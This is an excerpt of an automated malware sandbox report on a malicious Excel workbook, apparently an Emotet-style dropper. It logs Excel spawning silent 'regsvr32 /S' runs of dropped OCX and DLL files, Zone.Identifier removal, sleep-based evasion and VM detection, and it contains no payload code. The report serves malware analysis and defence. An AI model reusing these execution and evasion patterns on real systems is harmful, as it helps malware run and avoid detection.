                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CABC5_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EAC05_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B6D45_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F2DC5_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800202E05_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800226E05_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019AF05_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BEF05_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012EF85_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800297105_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800177105_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C7405_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020F445_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023B485_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800237485_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800217545_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800223585_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029F5C5_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B3685_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BF705_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800253745_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007F745_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180021F7C5_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800197885_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001B8C5_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800283945_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013B945_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001479C5_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E7A05_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800087A45_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017BA85_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EBAC5_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B3B85_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012BB85_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800257C05_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008BC05_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800117C45_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800227E05_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_002B00007_2_002B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800083F87_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800264107_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000680F7_2_000000018000680F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180025C307_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800136747_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017C8C7_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000A48C7_2_000000018000A48C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BEF07_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800297107_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026F147_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800237487_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001D587_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002B3687_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800013787_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800105907_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800091A87_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800165E47_2_00000001800165E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018FE87_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001ABE87_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029DF07_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800243F47_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180015DF47_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800011F47_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800247FC7_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001DBFC7_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000FE087_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001100C7_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180027E147_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000B6187_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800232207_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180027C287_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020A347_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800076347_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022E387_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E6387_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002143C7_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001303C7_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002A8407_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800038407_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000B4447_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F0487_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002AC4C7_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800100507_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800102507_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800030507_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180011E5C7_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000445C7_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C85C7_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800034607_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180026A647_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800042647_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180029C6C7_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001586C7_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000406C7_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E06C7_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BC707_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F6787_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E2787_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001447C7_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180005E7C7_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70C7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74D7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7537FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00000001800153F4 appears 48 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF70CB3B0 appears 148 times
                      Source: DETAILS 25922194612.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: DETAILS 25922194612.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: DETAILS 25922194612.xlsReversingLabs: Detection: 41%
                      Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6882.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@18/18@5/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: DETAILS 25922194612.xlsOLE indicator, Workbook stream: true
                      Source: DETAILS 25922194612.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: DETAILS 25922194612.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180006951 pushad ; retf 8_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_0000000180006951 pushad ; retf 10_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: T35PENELLOsp[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: Jf8[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr3.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: 4HWP0KQI[1].dll.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: uxevr4.ocx.0.drStatic PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr4.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FiPeSYwmr\Wuiko.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1468Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2588Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1292Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2960Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 464Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 900Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1268Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2224Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16379
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,9_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,11_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16381
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16530
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 0000000A.00000002.950666041.0000000000228000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RomNECVMWar_VMware_SATA_CD01_______________1.00___
                      Source: regsvr32.exe, 00000008.00000002.943436564.000000000038A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
